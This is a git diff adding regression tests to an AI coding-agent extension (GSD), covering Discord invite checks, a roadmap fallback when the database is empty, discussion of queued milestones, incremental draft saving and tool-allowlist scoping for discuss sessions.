+const FILES_WITH_INVITE_LINKS: string[] = [
+  "README.md",
+  "docs/what-is-pi/15-pi-packages-the-ecosystem.md",
+];
+
+describe("Discord invite links (#2699)", () => {
+  for (const relPath of FILES_WITH_INVITE_LINKS) {
+    it(`${relPath} contains only the canonical Discord invite`, () => {
+      const content = readFileSync(join(ROOT, relPath), "utf8");
+
+      // Extract all Discord invite URLs (discord.gg/X or discord.com/invite/X)
+      const invitePattern = /https?:\/\/(?:discord\.gg|discord\.com\/invite)\/[A-Za-z0-9]+/g;
+      const matches = content.match(invitePattern);
+
+      assert.ok(
+        matches && matches.length > 0,
+        `Expected at least one Discord invite link in ${relPath}`,
+      );
+
+      for (const link of matches) {
+        assert.equal(
+          link,
+          VALID_INVITE,
+          `Invalid Discord invite in ${relPath}: found "${link}", expected "${VALID_INVITE}"`,
+        );
+      }
+    });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/discuss-empty-db-fallback.test.ts b/src/resources/extensions/gsd/tests/discuss-empty-db-fallback.test.ts
new file mode 100644
index 000000000..a3268cf54
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-empty-db-fallback.test.ts
@@ -0,0 +1,127 @@
+/**
+ * discuss-empty-db-fallback.test.ts — Tests for #2892.
+ *
+ * When the DB is open but empty (e.g., after crash/truncation),
+ * getMilestoneSlices() returns [] and showDiscuss() incorrectly declares
+ * "All slices are complete." The fix adds a roadmap fallback: when the DB
+ * returns zero slices but a ROADMAP file exists, parse slices from the
+ * roadmap instead of treating zero slices as "all complete."
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import { dirname, join } from "node:path";
+import { parseRoadmapSlices } from "../roadmap-slices.ts";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────────
+
+function readGuidedFlowSource(): string {
+  const thisFile = fileURLToPath(import.meta.url);
+  const thisDir = dirname(thisFile);
+  return readFileSync(join(thisDir, "..", "guided-flow.ts"), "utf-8");
+}
+
+const SAMPLE_ROADMAP = `# M012 Roadmap
+
+## Slices
+- [ ] **S01: Core setup** \`risk:low\` \`depends:[]\`
+  > After this: basic project scaffolding works
+- [ ] **S02: Auth module** \`risk:medium\` \`depends:[S01]\`
+  > After this: users can log in
+- [ ] **S03: Dashboard** \`risk:low\` \`depends:[S02]\`
+  > After this: dashboard renders
+`;
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("discuss-empty-db-fallback (#2892)", () => {
+
+  test("1. parseRoadmapSlices extracts slices from a valid ROADMAP", () => {
+    const slices = parseRoadmapSlices(SAMPLE_ROADMAP);
+    assert.strictEqual(slices.length, 3, "should parse 3 slices from sample roadmap");
+    assert.strictEqual(slices[0]!.id, "S01");
+    assert.strictEqual(slices[1]!.id, "S02");
+    assert.strictEqual(slices[2]!.id, "S03");
+    // All slices are incomplete ([ ] not [x])
+    assert.ok(slices.every(s => !s.done), "all slices should be incomplete");
+  });
+
+  test("2. guided-flow imports parseRoadmapSlices for roadmap fallback", () => {
+    const source = readGuidedFlowSource();
+    assert.ok(
+      source.includes("parseRoadmapSlices"),
+      "guided-flow must import parseRoadmapSlices to support roadmap fallback when DB is empty",
+    );
+  });
+
+  test("3. guided-flow has roadmap fallback when normSlices is empty but roadmapContent exists", () => {
+    const source = readGuidedFlowSource();
+    // The fix must add a fallback that checks normSlices.length === 0 && roadmapContent
+    // and repopulates normSlices from the roadmap before the pendingSlices guard.
+    //
+    // Pattern: after DB query produces normSlices, if empty + roadmap exists,
+    // fall back to parseRoadmapSlices(roadmapContent).
+    const fallbackPattern = /normSlices\.length\s*===\s*0\s*&&\s*roadmapContent/;
+    assert.ok(
+      fallbackPattern.test(source),
+      "guided-flow must check normSlices.length === 0 && roadmapContent to trigger roadmap fallback",
+    );
+  });
+
+  test("4. guided-flow no longer has unguarded pendingSlices === 0 exit after DB-only query", () => {
+    const source = readGuidedFlowSource();
+    // Extract the showDiscuss function body
+    const fnMatch = source.match(
+      /async function showDiscuss\s*\([^)]*\)[^{]*\{([\s\S]*?)\nfunction\s/,
+    );
+    assert.ok(!!fnMatch, "showDiscuss function body must be found");
+
+    if (fnMatch) {
+      const body = fnMatch[1]!;
+      // After the DB query block (isDbAvailable/getMilestoneSlices), there should
+      // be a roadmap fallback BEFORE the pendingSlices.length === 0 check.
+      // Find the getMilestoneSlices call and the pendingSlices === 0 check
+      const dbQueryIdx = body.indexOf("getMilestoneSlices");
+      const fallbackIdx = body.indexOf("parseRoadmapSlices");
+      const pendingGuardIdx = body.indexOf('pendingSlices.length === 0');
+
+      assert.ok(dbQueryIdx > 0, "getMilestoneSlices call must exist");
+      assert.ok(fallbackIdx > 0, "parseRoadmapSlices fallback must exist");
+      assert.ok(pendingGuardIdx > 0, "pendingSlices.length === 0 guard must exist");
+      assert.ok(
+        fallbackIdx > dbQueryIdx && fallbackIdx < pendingGuardIdx,
+        "parseRoadmapSlices fallback must appear BETWEEN DB query and pendingSlices === 0 guard",
+      );
+    }
+  });
+
+  test("5. roadmap-parsed slices map to NormSlice format with done=false by default", () => {
+    // When falling back to roadmap, incomplete slices ([ ]) should map to done:false,
+    // ensuring they appear as pending and are NOT falsely reported as complete.
+    const slices = parseRoadmapSlices(SAMPLE_ROADMAP);
+    const normSlices = slices.map(s => ({ id: s.id, done: s.done, title: s.title }));
+    const pendingSlices = normSlices.filter(s => !s.done);
+    assert.strictEqual(pendingSlices.length, 3,
+      "all 3 incomplete roadmap slices should be pending — not falsely treated as complete");
+  });
+
+  test("6. roadmap with completed slices correctly reports them as done", () => {
+    const completedRoadmap = `# M012 Roadmap
+
+## Slices
+- [x] **S01: Core setup** \`risk:low\` \`depends:[]\`
+  > After this: basic project scaffolding works
+- [ ] **S02: Auth module** \`risk:medium\` \`depends:[S01]\`
+  > After this: users can log in
+- [x] **S03: Dashboard** \`risk:low\` \`depends:[S02]\`
+  > After this: dashboard renders
+`;
+    const slices = parseRoadmapSlices(completedRoadmap);
+    const normSlices = slices.map(s => ({ id: s.id, done: s.done, title: s.title }));
+    const pendingSlices = normSlices.filter(s => !s.done);
+    assert.strictEqual(pendingSlices.length, 1, "only S02 should be pending");
+    assert.strictEqual(pendingSlices[0]!.id, "S02");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/discuss-incremental-persistence.test.ts b/src/resources/extensions/gsd/tests/discuss-incremental-persistence.test.ts
new file mode 100644
index 000000000..aa3f0d42f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-incremental-persistence.test.ts
@@ -0,0 +1,36 @@
+/**
+ * Regression test for discuss phase incremental persistence (#2152).
+ * Verifies both milestone and slice discuss prompts instruct agents to
+ * save CONTEXT-DRAFT incrementally during question rounds.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const promptsDir = join(__dirname, "..", "prompts");
+
+describe("discuss incremental persistence (#2152)", () => {
+  test("milestone discuss prompt includes CONTEXT-DRAFT save instruction", () => {
+    const content = readFileSync(join(promptsDir, "guided-discuss-milestone.md"), "utf-8");
+    assert.match(content, /CONTEXT-DRAFT/, "should mention CONTEXT-DRAFT");
+    assert.match(content, /Incremental persistence/, "should have incremental persistence section");
+    assert.match(content, /gsd_summary_save/, "should use gsd_summary_save tool");
+  });
+
+  test("slice discuss prompt includes CONTEXT-DRAFT save instruction", () => {
+    const content = readFileSync(join(promptsDir, "guided-discuss-slice.md"), "utf-8");
+    assert.match(content, /CONTEXT-DRAFT/, "should mention CONTEXT-DRAFT");
+    assert.match(content, /Incremental persistence/, "should have incremental persistence section");
+  });
+
+  test("drafts are saved silently without user notification", () => {
+    const milestone = readFileSync(join(promptsDir, "guided-discuss-milestone.md"), "utf-8");
+    const slice = readFileSync(join(promptsDir, "guided-discuss-slice.md"), "utf-8");
+    assert.match(milestone, /Do NOT mention this save to the user/);
+    assert.match(slice, /Do NOT mention this to the user/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/discuss-queued-milestones.test.ts b/src/resources/extensions/gsd/tests/discuss-queued-milestones.test.ts
new file mode 100644
index 000000000..63e79f3f6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-queued-milestones.test.ts
@@ -0,0 +1,281 @@
+/**
+ * discuss-queued-milestones.test.ts — Tests for #2307.
+ *
+ * /gsd discuss was previously gated on state.activeMilestone, which prevented
+ * users from discussing queued (pending) milestones during roadmap grooming.
+ *
+ * These tests verify:
+ *   1. deriveState correctly identifies pending milestones (the set the picker
+ *      will show when no active milestone is present)
+ *   2. resolveMilestoneFile correctly resolves context artifacts for pending
+ *      milestones so the picker can report their discussion state
+ *   3. The guided-flow.ts source code no longer hard-exits when no active
+ *      milestone exists but pending milestones are present
+ *   4. The helper functions for queued discuss exist in the source
+ */
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { fileURLToPath } from "node:url";
+import { dirname } from "node:path";
+
+import { deriveState } from "../state.ts";
+import { invalidateAllCaches } from "../cache.ts";
+import { resolveMilestoneFile } from "../paths.ts";
+
+// ─── Fixture Helpers ──────────────────────────────────────────────────────────
+
+function createBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-discuss-queued-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+function writeMilestoneDir(base: string, mid: string): void {
+  mkdirSync(join(base, ".gsd", "milestones", mid), { recursive: true });
+}
+
+function writeContext(base: string, mid: string, content: string): void {
+  writeMilestoneDir(base, mid);
+  writeFileSync(join(base, ".gsd", "milestones", mid, `${mid}-CONTEXT.md`), content);
+}
+
+function writeContextDraft(base: string, mid: string, content: string): void {
+  writeMilestoneDir(base, mid);
+  writeFileSync(join(base, ".gsd", "milestones", mid, `${mid}-CONTEXT-DRAFT.md`), content);
+}
+
+function writeRoadmap(base: string, mid: string, content: string): void {
+  writeMilestoneDir(base, mid);
+  writeFileSync(join(base, ".gsd", "milestones", mid, `${mid}-ROADMAP.md`), content);
+}
+
+function readGuidedFlowSource(): string {
+  const thisFile = fileURLToPath(import.meta.url);
+  const thisDir = dirname(thisFile);
+  return readFileSync(join(thisDir, "..", "guided-flow.ts"), "utf-8");
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────────
+
+describe("discuss-queued-milestones (#2307)", () => {
+
+  test("1. pending milestones appear in registry when active milestone exists", async () => {
+    const base = createBase();
+    try {
+      // M001: active — has context + roadmap with a slice
+      writeContext(base, "M001", "# M001: Active\nContext here.");
+      writeRoadmap(base, "M001",
+        "# M001: Active\n\n## Slices\n- [ ] **S01: Do work** `risk:low` `depends:[]`\n  > After this: works\n");
+
+      // M002: pending — context only, no roadmap
+      writeContext(base, "M002", "# M002: Queued\nFuture work.");
+
+      // M003: pending — draft context only
+      writeContextDraft(base, "M003", "# M003: Draft\nSeed material.");
+
+      invalidateAllCaches();
+      const state = await deriveState(base);
+
+      assert.ok(!!state.activeMilestone, "M001 should be the active milestone");
+      assert.strictEqual(state.activeMilestone?.id, "M001");
+
+      const pendingIds = state.registry
+        .filter(m => m.status === "pending")
+        .map(m => m.id);
+
+      assert.ok(pendingIds.includes("M002"), "M002 should be pending");
+      assert.ok(pendingIds.includes("M003"), "M003 should be pending");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("2. first context-only milestone is active, subsequent ones are pending", async () => {
+    const base = createBase();
+    try {
+      // M001: first milestone with context but no roadmap — deriveState marks it active
+      writeContext(base, "M001", "# M001: First\nContext here.");
+      // M002: will be pending since M001 is active
+      writeContext(base, "M002", "# M002: Second\nMore future work.");
+
+      invalidateAllCaches();
+      const state = await deriveState(base);
+
+      // deriveState makes the first unfinished milestone "active" even without a roadmap
+      assert.ok(!!state.activeMilestone, "first milestone should be active");
+      assert.strictEqual(state.activeMilestone?.id, "M001", "M001 is the active milestone");
+
+      const pendingIds = state.registry
+        .filter(m => m.status === "pending")
+        .map(m => m.id);
+
+      assert.ok(pendingIds.includes("M002"),
+        "M002 should be pending — it comes after the active M001");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("3. resolveMilestoneFile finds CONTEXT.md for pending milestone", (t) => {
+    const base = createBase();
+    try {
+      writeContext(base, "M002", "# M002: Queued\nContent.");
+
+      const contextFile = resolveMilestoneFile(base, "M002", "CONTEXT");
+      assert.ok(contextFile !== null, "resolveMilestoneFile should find CONTEXT.md for M002");
+      assert.ok(contextFile!.endsWith("M002-CONTEXT.md"),
+        "resolved path should point to M002-CONTEXT.md");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("4. resolveMilestoneFile finds CONTEXT-DRAFT.md for pending milestone", (t) => {
+    const base = createBase();
+    try {
+      writeContextDraft(base, "M003", "# M003: Draft\nSeed content.");
+
+      const draftFile = resolveMilestoneFile(base, "M003", "CONTEXT-DRAFT");
+      assert.ok(draftFile !== null, "resolveMilestoneFile should find CONTEXT-DRAFT.md for M003");
+      assert.ok(draftFile!.endsWith("M003-CONTEXT-DRAFT.md"),
+        "resolved path should point to M003-CONTEXT-DRAFT.md");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("5. resolveMilestoneFile returns null when pending milestone has no context", (t) => {
+    const base = createBase();
+    try {
+      writeMilestoneDir(base, "M004");
+
+      const contextFile = resolveMilestoneFile(base, "M004", "CONTEXT");
+      assert.strictEqual(contextFile, null,
+        "resolveMilestoneFile should return null when no CONTEXT.md exists");
+
+      const draftFile = resolveMilestoneFile(base, "M004", "CONTEXT-DRAFT");
+      assert.strictEqual(draftFile, null,
+        "resolveMilestoneFile should return null when no CONTEXT-DRAFT.md exists");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("6. guided-flow no longer hard-exits when no active milestone but pending exist", () => {
+    const source = readGuidedFlowSource();
+
+    // The old guard was a simple early-exit:
+    //   if (!state.activeMilestone) {
+    //     ctx.ui.notify("No active milestone. Run /gsd to create one first.", "warning");
+    //     return;
+    //   }
+    //
+    // The new guard should check for pending milestones and route instead.
+    const oldGuardPattern = /if\s*\(!state\.activeMilestone\)\s*\{\s*ctx\.ui\.notify\("No active milestone/;
+    assert.ok(
+      !oldGuardPattern.test(source),
+      "guided-flow must not unconditionally exit when activeMilestone is null",
+    );
+  });
+
+  test("7. showDiscussQueuedMilestone helper exists in guided-flow", () => {
+    const source = readGuidedFlowSource();
+    assert.ok(
+      source.includes("showDiscussQueuedMilestone"),
+      "guided-flow must export showDiscussQueuedMilestone helper",
+    );
+  });
+
+  test("8. dispatchDiscussForMilestone helper exists in guided-flow", () => {
+    const source = readGuidedFlowSource();
+    assert.ok(
+      source.includes("dispatchDiscussForMilestone"),
+      "guided-flow must export dispatchDiscussForMilestone helper",
+    );
+  });
+
+  test("9. dispatchDiscussForMilestone does not set pendingAutoStart", () => {
+    const source = readGuidedFlowSource();
+
+    // Extract the dispatchDiscussForMilestone function body
+    const fnMatch = source.match(
+      /async function dispatchDiscussForMilestone\s*\([^)]*\)[^{]*\{([\s\S]*?)\n\}/,
+    );
+    assert.ok(!!fnMatch, "dispatchDiscussForMilestone function body must be present");
+
+    if (fnMatch) {
+      assert.ok(
+        !fnMatch[1].includes("pendingAutoStart"),
+        "dispatchDiscussForMilestone must NOT set pendingAutoStart — discussing a queued milestone must not activate it",
+      );
+    }
+  });
+
+  test("10. slice picker includes queued milestone option when pending milestones exist", () => {
+    const source = readGuidedFlowSource();
+    assert.ok(
+      source.includes("discuss_queued_milestone"),
+      "slice picker must include a 'discuss_queued_milestone' action id for queued milestones",
+    );
+    assert.ok(
+      source.includes("Discuss a queued milestone"),
+      "slice picker must label the queued milestone action clearly",
+    );
+  });
+
+  test("11. queued milestone picker labels entries with [queued]", () => {
+    const source = readGuidedFlowSource();
+    assert.ok(
+      source.includes("[queued]"),
+      "queued milestone picker must label entries with [queued] to distinguish from active",
+    );
+  });
+
+  // ─── #3150: allDiscussed early-return must not block queued milestone discussion ──
+
+  test("12. allDiscussed path checks for pending milestones before returning (#3150)", () => {
+    const source = readGuidedFlowSource();
+
+    // Extract the allDiscussed block — the if (allDiscussed) { ... } body
+    const allDiscussedMatch = source.match(
+      /const allDiscussed = pendingSlices\.every\([\s\S]*?\n    if \(allDiscussed\) \{([\s\S]*?)\n    \}/,
+    );
+    assert.ok(!!allDiscussedMatch, "allDiscussed guard block must exist in showDiscuss()");
+
+    if (allDiscussedMatch) {
+      const body = allDiscussedMatch[1];
+      // The fix must check for pending milestones and route to showDiscussQueuedMilestone
+      assert.ok(
+        body.includes("pending") && body.includes("showDiscussQueuedMilestone"),
+        "allDiscussed block must check for pending milestones and call showDiscussQueuedMilestone before returning (#3150)",
+      );
+    }
+  });
+
+  test("13. pendingSlices.length===0 path checks for pending milestones before returning (#3150)", () => {
+    const source = readGuidedFlowSource();
+
+    // Find the pendingSlices.length === 0 guard block
+    const zeroSlicesMatch = source.match(
+      /if \(pendingSlices\.length === 0\) \{([\s\S]*?)\n  \}/,
+    );
+    assert.ok(!!zeroSlicesMatch, "pendingSlices.length === 0 guard block must exist in showDiscuss()");
+
+    if (zeroSlicesMatch) {
+      const body = zeroSlicesMatch[1];
+      // The fix must check for pending milestones and route to showDiscussQueuedMilestone
+      assert.ok(
+        body.includes("pending") && body.includes("showDiscussQueuedMilestone"),
+        "pendingSlices.length===0 block must check for pending milestones and call showDiscussQueuedMilestone before returning (#3150)",
+      );
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/discuss-slice-structured-questions.test.ts b/src/resources/extensions/gsd/tests/discuss-slice-structured-questions.test.ts
new file mode 100644
index 000000000..a52114df6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-slice-structured-questions.test.ts
@@ -0,0 +1,46 @@
+/**
+ * Regression test for discuss-slice structured questions availability
+ *
+ * The guided-discuss-slice.md template must use the structuredQuestionsAvailable
+ * template variable to conditionally switch between ask_user_questions tool
+ * calls and plain-text questions, so the prompt works correctly when the
+ * structured questions tool is not available.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const template = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'prompts', 'guided-discuss-slice.md'),
+  'utf-8',
+)
+
+describe('discuss-slice structuredQuestionsAvailable template variable', () => {
+  it('template references structuredQuestionsAvailable variable', () => {
+    assert.ok(
+      template.includes('{{structuredQuestionsAvailable}}'),
+      'guided-discuss-slice.md must use {{structuredQuestionsAvailable}} template variable',
+    )
+  })
+
+  it('template handles both true and false cases', () => {
+    const trueCase = template.includes('`{{structuredQuestionsAvailable}}` is `true`')
+    const falseCase = template.includes('`{{structuredQuestionsAvailable}}` is `false`')
+
+    assert.ok(trueCase, 'template must have a branch for structuredQuestionsAvailable=true')
+    assert.ok(falseCase, 'template must have a branch for structuredQuestionsAvailable=false')
+  })
+
+  it('false case instructs plain text questions', () => {
+    const falseIdx = template.indexOf('`{{structuredQuestionsAvailable}}` is `false`')
+    assert.ok(falseIdx !== -1)
+
+    const afterFalse = template.slice(falseIdx, falseIdx + 300)
+    assert.ok(
+      afterFalse.includes('plain text'),
+      'when structuredQuestionsAvailable is false, questions should be in plain text',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/discuss-tool-scope-leak.test.ts b/src/resources/extensions/gsd/tests/discuss-tool-scope-leak.test.ts
new file mode 100644
index 000000000..caddc8d84
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-tool-scope-leak.test.ts
@@ -0,0 +1,76 @@
+// GSD-2 — Regression test for #3616: discuss tool scoping must not leak into subsequent sessions
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+/**
+ * Bug #3616: After a discuss session narrows the active tool set via
+ * setActiveTools(), the narrowed list persisted into the next auto-mode
+ * session because newSession() did not restore extension tools when cwd
+ * was unchanged. This caused gsd_plan_slice and other DB tools to be
+ * missing from plan-slice subagent sessions.
+ *
+ * This test verifies the structural properties that prevent the leak:
+ *   1. guided-flow.ts narrows tools ONLY for discuss-* unit types
+ *   2. The narrowed set explicitly excludes gsd_plan_slice (a HEAVY_TOOL)
+ *   3. agent-session.ts:newSession() has an else-branch that restores
+ *      all extension tools even when cwd hasn't changed
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { DISCUSS_TOOLS_ALLOWLIST } from "../constants.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const guidedFlowSource = readFileSync(join(__dirname, "..", "guided-flow.ts"), "utf-8");
+
+describe("#3616 — discuss tool scoping must not leak across sessions", () => {
+	test("gsd_plan_slice is NOT in DISCUSS_TOOLS_ALLOWLIST", () => {
+		assert.ok(
+			!DISCUSS_TOOLS_ALLOWLIST.includes("gsd_plan_slice"),
+			"gsd_plan_slice should be excluded from discuss scope (it's a heavy planning tool)",
+		);
+	});
+
+	test("tool scoping only activates for discuss-* unit types", () => {
+		// The guard must be: if (unitType?.startsWith("discuss-"))
+		assert.ok(
+			guidedFlowSource.includes('unitType?.startsWith("discuss-")'),
+			"tool scoping should only trigger for discuss-* unit types",
+		);
+	});
+
+	test("discuss tool scoping uses setActiveTools (not setTools) for reversibility", () => {
+		// setActiveTools changes the active subset but doesn't remove tools from
+		// the registry. newSession()'s _refreshToolRegistry can restore them.
+		assert.ok(
+			guidedFlowSource.includes("pi.setActiveTools(scopedTools)"),
+			"should use pi.setActiveTools to narrow tools (preserving registry)",
+		);
+	});
+
+	test("newSession() in agent-session.ts has defense against tool narrowing persistence", () => {
+		const agentSessionSource = readFileSync(
+			join(process.cwd(), "packages/pi-coding-agent/src/core/agent-session.ts"),
+			"utf-8",
+		);
+		const newSessionStart = agentSessionSource.indexOf("async newSession(options?:");
+		assert.ok(newSessionStart >= 0, "should find newSession");
+		const body = agentSessionSource.slice(newSessionStart, newSessionStart + 3000);
+
+		// Both branches (cwd-changed and cwd-unchanged) must include extension tools
+		assert.ok(
+			body.includes("includeAllExtensionTools: true"),
+			"newSession() must include all extension tools in both branches",
+		);
+
+		// Count occurrences — should be at least 2 (one per branch)
+		const matches = body.match(/includeAllExtensionTools:\s*true/g);
+		assert.ok(
+			matches && matches.length >= 2,
+			`expected >=2 includeAllExtensionTools:true in newSession(), got ${matches?.length ?? 0}`,
+		);
+	});
+});
diff --git a/src/resources/extensions/gsd/tests/discuss-tool-scoping.test.ts b/src/resources/extensions/gsd/tests/discuss-tool-scoping.test.ts
new file mode 100644
index 000000000..36fc332c9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discuss-tool-scoping.test.ts
@@ -0,0 +1,130 @@
+/**
+ * discuss-tool-scoping.test.ts — Tests for #2949.
+ *
+ * xAI/Grok returns "Grammar is too complex" (400) when the combined tool
+ * schemas exceed the provider's grammar limit. The GSD discuss flow only
+ * needs a small subset of tools (summary_save, decision_save, etc.), but
+ * was sending ALL ~30+ tools to the provider.
+ *
+ * These tests verify:
+ *   1. DISCUSS_TOOLS_ALLOWLIST is exported and contains only the tools
+ *      needed during discuss flows (no heavy planning/execution/completion tools).
+ *   2. Heavy execution tools are NOT in the allowlist.
+ *   3. The allowlist includes the tools actually referenced by discuss prompts.
+ *   4. dispatchWorkflow scopes tools when unitType is a discuss variant.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { DISCUSS_TOOLS_ALLOWLIST } from "../constants.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const promptsDir = join(__dirname, "..", "prompts");
+const guidedFlowPath = join(__dirname, "..", "guided-flow.ts");
+
+// ─── Heavy tools that should NOT be in discuss scope ─────────────────────────
+
+/** Tools that are only needed during planning, execution, or completion phases */
+const HEAVY_TOOLS = [
+  "gsd_plan_slice",
+  "gsd_slice_plan",
+  "gsd_plan_task",
+  "gsd_task_plan",
+  "gsd_task_complete",
+  "gsd_complete_task",
+  "gsd_slice_complete",
+  "gsd_complete_slice",
+  "gsd_complete_milestone",
+  "gsd_milestone_complete",
+  "gsd_validate_milestone",
+  "gsd_milestone_validate",
+  "gsd_replan_slice",
+  "gsd_slice_replan",
+  "gsd_reassess_roadmap",
+  "gsd_roadmap_reassess",
+  "gsd_save_gate_result",
+];
+
+// ─── Tools that discuss prompts reference ────────────────────────────────────
+
+/** Tools explicitly called by discuss prompt templates */
+const DISCUSS_REQUIRED_TOOLS = [
+  "gsd_summary_save",          // guided-discuss-slice.md, guided-discuss-milestone.md, discuss.md
+  "gsd_decision_save",         // discuss.md output phase
+  "gsd_plan_milestone",        // discuss.md output phase (single + multi milestone)
+  "gsd_milestone_generate_id", // discuss.md multi-milestone Phase 1
+  "gsd_requirement_update",    // used during discuss for requirement updates
+];
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("discuss tool scoping (#2949)", () => {
+  test("DISCUSS_TOOLS_ALLOWLIST is exported and non-empty", () => {
+    assert.ok(Array.isArray(DISCUSS_TOOLS_ALLOWLIST), "should be an array");
+    assert.ok(DISCUSS_TOOLS_ALLOWLIST.length > 0, "should not be empty");
+  });
+
+  test("DISCUSS_TOOLS_ALLOWLIST excludes heavy execution/completion tools", () => {
+    for (const heavy of HEAVY_TOOLS) {
+      assert.ok(
+        !DISCUSS_TOOLS_ALLOWLIST.includes(heavy),
+        `allowlist should NOT include heavy tool "${heavy}"`,
+      );
+    }
+  });
+
+  test("DISCUSS_TOOLS_ALLOWLIST includes tools referenced by discuss prompts", () => {
+    for (const required of DISCUSS_REQUIRED_TOOLS) {
+      assert.ok(
+        DISCUSS_TOOLS_ALLOWLIST.includes(required),
+        `allowlist should include "${required}" (used by discuss prompts)`,
+      );
+    }
+  });
+
+  test("DISCUSS_TOOLS_ALLOWLIST is significantly smaller than full tool set", () => {
+    // Full set is 27 DB tools + dynamic + journal = 33+
+    // Discuss set should be roughly 10 GSD tools (5 canonical + 5 aliases)
+    assert.ok(
+      DISCUSS_TOOLS_ALLOWLIST.length <= 12,
+      `allowlist should have at most 12 GSD tools, got ${DISCUSS_TOOLS_ALLOWLIST.length}`,
+    );
+  });
+
+  test("guided-discuss-slice.md references gsd_summary_save", () => {
+    const prompt = readFileSync(join(promptsDir, "guided-discuss-slice.md"), "utf-8");
+    assert.ok(
+      prompt.includes("gsd_summary_save"),
+      "guided-discuss-slice.md should reference gsd_summary_save",
+    );
+  });
+
+  test("discuss.md references gsd_plan_milestone and gsd_decision_save", () => {
+    const prompt = readFileSync(join(promptsDir, "discuss.md"), "utf-8");
+    assert.ok(
+      prompt.includes("gsd_plan_milestone"),
+      "discuss.md should reference gsd_plan_milestone",
+    );
+    assert.ok(
+      prompt.includes("gsd_decision_save"),
+      "discuss.md should reference gsd_decision_save",
+    );
+  });
+
+  test("dispatchWorkflow source code scopes tools for discuss unit types", () => {
+    const source = readFileSync(guidedFlowPath, "utf-8");
+    // Verify that dispatchWorkflow references the allowlist for tool scoping
+    assert.ok(
+      source.includes("DISCUSS_TOOLS_ALLOWLIST"),
+      "guided-flow.ts should reference DISCUSS_TOOLS_ALLOWLIST for tool scoping",
+    );
+    assert.ok(
+      source.includes("setActiveTools"),
+      "guided-flow.ts should call setActiveTools to scope tools during discuss",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/dispatch-guard-closed-status.test.ts b/src/resources/extensions/gsd/tests/dispatch-guard-closed-status.test.ts
new file mode 100644
index 000000000..6be6a5a5f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/dispatch-guard-closed-status.test.ts
@@ -0,0 +1,33 @@
+/**
+ * dispatch-guard-closed-status.test.ts — #3653
+ *
+ * Verify that the dispatch guard uses isClosedStatus() instead of a raw
+ * `status === "complete"` check when determining whether a slice is done.
+ * Reconciled slices may carry statuses like "skipped" or "cancelled" which
+ * are also closed — the raw check caused false dispatch blocks.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const sourceFile = join(__dirname, "..", "dispatch-guard.ts");
+
+describe("dispatch-guard isClosedStatus migration (#3653)", () => {
+  const source = readFileSync(sourceFile, "utf-8");
+
+  test("imports isClosedStatus from status-guards", () => {
+    assert.match(source, /import\s*\{[^}]*isClosedStatus[^}]*\}\s*from\s*["']\.\/status-guards/);
+  });
+
+  test("uses isClosedStatus() for slice done check instead of raw comparison", () => {
+    assert.match(source, /done:\s*isClosedStatus\(r\.status\)/);
+  });
+
+  test("does not use raw status === 'complete' for DB slice rows", () => {
+    assert.doesNotMatch(source, /done:\s*r\.status\s*===\s*["']complete["']/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/dispatch-guard.test.ts b/src/resources/extensions/gsd/tests/dispatch-guard.test.ts
index 448014009..1989a0195 100644
--- a/src/resources/extensions/gsd/tests/dispatch-guard.test.ts
+++ b/src/resources/extensions/gsd/tests/dispatch-guard.test.ts
@@ -4,184 +4,262 @@ import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { getPriorSliceCompletionBlocker } from "../dispatch-guard.ts";
